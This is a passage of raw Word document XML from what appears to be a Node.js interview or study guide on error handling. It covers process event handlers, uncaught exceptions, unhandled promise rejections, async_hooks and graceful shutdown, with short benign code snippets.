        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exit Codes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose appropriate exit codes to indicate different types of errors or states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A0ED4" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cleanup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that any necessary cleanup (e.g., closing connections, saving state) is performed before calling process.exit().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927C3B1"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4. Process-Level Event Handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B2DA0"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In addition to handling specific errors, you can use other process-level events to monitor and manage the application’s behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762222E" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.on('warning', callback)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handles process warnings such as deprecations or potential issues in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5E406" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.on('SIGINT', callback)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handles the termination signal (e.g., when you press Ctrl+C), allowing for graceful shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A15738"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process.on('SIGINT', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BE5FF"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console.log('Received SIGINT. Shutting down gracefully.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D33BA3"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 Perform cleanup before exiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A38114"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 xml:space="preserve">  process.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159BC432"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C26EA2"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B06BC" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.on('uncaughtException')</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Catches exceptions not handled within the code, allowing for cleanup and process termination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE1186" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.on('unhandledRejection')</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Catches promise rejections that are not handled within the code, providing an opportunity for cleanup and process termination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52F023" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Terminates the Node.js process with a specific exit code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD339DD" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Other Process-Level Events</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle signals and warnings to manage process behavior and ensure graceful shutdowns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AA26D" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43986F2C" w14:textId="67C67F82" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc178383349"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How can you handle uncaught exceptions in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="51C86D58"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Handling uncaught exceptions in Node.js is critical for maintaining the stability of your application and ensuring that unexpected errors do not cause your application to crash abruptly. Here’s how you can manage uncaught exceptions effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117989F"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1. Use process.on('uncaughtException')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146C275"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You can listen for the uncaughtException event on the process object to handle exceptions that are not caught by any try/catch block. This is a last-resort mechanism and should be used carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EF346"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4D2C275D"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF0975"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A8BD8"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Perform necessary cleanup or logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E3BC1A"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Exit the process to prevent inconsistent state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B41B18"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8045E8"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lastRenderedPageBreak/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706951F"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729396CF" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cleanup and Exit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> After handling the error, it is generally recommended to perform any necessary cleanup (e.g., closing database connections) and then exit the process. Node.js may be left in an inconsistent state after an uncaught exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D6728" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Overreliance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relying heavily on uncaughtException is not a substitute for proper error handling within your application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B28FF"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2. Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA092B4"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If you need to shut down the application gracefully after an uncaught exception, you can set up handlers to perform cleanup tasks before exiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728FBF3"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28EF82C7"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0778E65C"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A17A3"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1DD9953E"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Perform cleanup operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F3ADF"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cleanUpTasks().then(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2648F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798C333"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}).catch(cleanupErr =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85621B"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console.error('Cleanup failed:', cleanupErr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1172E9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A722AF5"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8E702CD"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21632773"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3ED2A5C"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 function cleanUpTasks() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F057A"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Implement your cleanup logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6002157A"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For example: closing database connections, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFEC269"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A750EDC"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3. Use domain Module (Deprecated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7EA28"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Node.js had a domain module to handle errors across asynchronous operations, but it is deprecated and not recommended for use. It was designed to provide a way to handle uncaught exceptions and other errors within a specific domain of code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EF15F"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The domain module is no longer recommended and has been deprecated in favor of other error-handling strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EB87A"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4. Use async_hooks Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6820FA"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The async_hooks module provides a way to track asynchronous resources and their lifecycle. While it can be complex, it offers more control and is useful for advanced error handling and diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5C593"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12F1D250"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async_hooks = require('async_hooks');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E0A92"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5887621"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hooks = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28A9D4"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init(asyncId, type, triggerAsyncId, resource) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607FBAF"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Track initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F6853"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0622CBE"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destroy(asyncId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B40C7"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Track destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0DE45"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BEBDDF4"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2AE87CC"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C9C72C1"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asyncHook = async_hooks.createHook(hooks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB2131"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asyncHook.enable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F652ECA"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7C0DAFD"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E136C"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BE549"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Optionally use asyncHook to gather more information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77ED33"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3828A"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743A6C7"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5. Handle Unhandled Promise Rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961CE14" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Starting with Node.js v15, unhandled promise rejections are treated as exceptions. Handling them is similar to uncaught exceptions, and you can use the process.on('unhandledRejection') event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B9F0F"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3B86C200"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD5EC7"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console.error('Unhandled Rejection at:', promise, 'reason:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9DDE5"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Perform necessary cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05827FB9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A9466" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A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5CC1619" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61789F76" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Catch Errors Locally:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prefer handling errors within the scope where they occur, using try/catch, .catch() for promises, and async/await with try/catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A5EA9" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use logging tools and libraries to capture error details for diagnostics and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E6FB5" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Shutdown:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that your application performs necessary cleanup operations before shutting down in response to an uncaught exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF04566" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Avoid Using uncaughtException as a Primary Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relying solely on uncaughtException can mask other errors and lead to unpredictable behavior. Implement robust error handling within your application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4331E" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4242BD36" w14:textId="71EC5E42" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc178383350"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the use of Promise and async/await in error handling.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="6B866E2E" w14:textId="77777777" w:rsidR="007B134F" w:rsidRPr="00DA2F32" w:rsidRDefault="007B134F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling with Promises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DC3C3" w14:textId="77777777" w:rsidR="007B134F" w:rsidRPr="00DA2F32" w:rsidRDefault="007B134F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
